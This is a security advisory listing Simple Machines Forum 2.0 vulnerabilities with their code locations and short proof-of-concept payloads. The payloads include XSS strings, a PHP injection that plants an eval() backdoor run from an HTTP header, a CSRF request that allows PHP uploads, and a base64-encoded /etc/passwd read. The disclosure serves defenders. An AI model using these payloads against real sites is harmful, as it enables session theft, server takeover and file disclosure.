Simple Machines Forum XSS / XSRF / PHP Execution

`This is the first batch of vulnerabilities found by the SimpleAudit team from elhacker.net   
http://labs.elhacker.net/simpleaudit  
  
Our goal is to evaluate the security of SMF 2.0 before using it on our own server, and we have found several security vulnerabilities.   
  
The vulnerabilities that also apply to SMF 1.1.10 were fixed by the SMF team today, on SMF 1.1.11 visit simplemachines.org for details.  
  
  
You can review the list of the published vulnerabilities in:  
http://code.google.com/p/smf2-review/issues/list   
  
  
  
Description: XSS in 'website' field in User Profile  
Discovered by: [email protected]  
Vulnerable code: Sources/Profile-Modify.php:802  
Vulnerable URL: N/A  
PoC: javascript:alert(document.cookie);//http://xx  
  
  
Description: PHP Remote Code Execution  
Discovered by: [email protected]  
Vulnerable code: Sources/ManageServer.php:1409  
Vulnerable URL: Themes/default/languages/index.english.php  
PoC: en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //  
  
  
Description:CSRF theme change  
Discovered by: [email protected]  
Vulnerable code: Sources/Load.php#1245  
Vulnerable URL: index.php?theme=2  
PoC: N/A  
  
  
Description: Subforum Category Collapse CSRF  
Discovered by: [email protected]  
Vulnerable code: Sources/BoardIndex.php:130  
Vulnerable URL: index.php?action=collapse;c=1;sa=collapse  
PoC: N/A  
  
  
Description: CSRF in package server manager  
Discovered by: [email protected]  
Vulnerable code: Sources/Packages.php#1189  
Vulnerable URL:  
http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1  
PoC: N/A  
  
  
Description: XSS in package server manager  
Discovered by: [email protected]  
Vulnerable code: Sources/PackageGet.php#732  
Vulnerable URL: index.php?action=packageget  
PoC: "Add server" => Name: <h1>XSS</h1>  
  
  
Description: CSRF package deletion and installed package disclosure  
Discovered by: [email protected]  
Vulnerable code: Sources/Packages.php#1189  
Vulnerable URL:   
/index.php?action=admin;area=packages;sa=remove;package=.htaccess  
PoC: N/A  
  
  
Description: Attached files configuration CSRF  
Discovered by: [email protected]  
Vulnerable code: Sources/ManageAttachments.php#117  
Sources/ManageAttachments.php#162  
Vulnerable URL:   
/index.php?action=admin;area=manageattachments;sa=attachments  
PoC: POST:  
attachmentEnable=1&attachmentExtensions=com%2Cexe%2Cphp5%2Cphp4%2Cconf%2Ccfg%2Cini%2Chtaccess%2Cphp&attachmentUploadDir=%2Fopt%2Flampp%2Fhtdocs%2Fsmf_2%2Fattachments&attachmentDirSizeLimit=10240&attachmentPostLimit=192&attachmentSizeLimit=128&attachmentNumPerPostLimit=4&attachmentShowImages=1&attachmentThumbnails=1&attachmentThumbWidth=150&attachmentThumbHeight=150  
  
  
Description: XSS in "Enable basic HTML in posts"  
Discovered by: [email protected]  
Vulnerable code: N/A  
Vulnerable URL: N/A  
PoC: <img src="http:// alt="x http://www.google.com/onerror=alert(1)// x">  
  
  
Description: Remote File Disclosure logs  
Discovered by: [email protected]  
Vulnerable code: N/A  
Vulnerable URL:   
index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==  
PoC: An attacker forcing that page to render as CSS can enable him to read   
it's content.  
  
  
Description: CSRF in Moderation Preferences  
Discovered by: [email protected]  
Vulnerable code: N/A  
Vulnerable URL: index.php?action=moderate;area=settings  
PoC: this is not protected against csrf  
  
`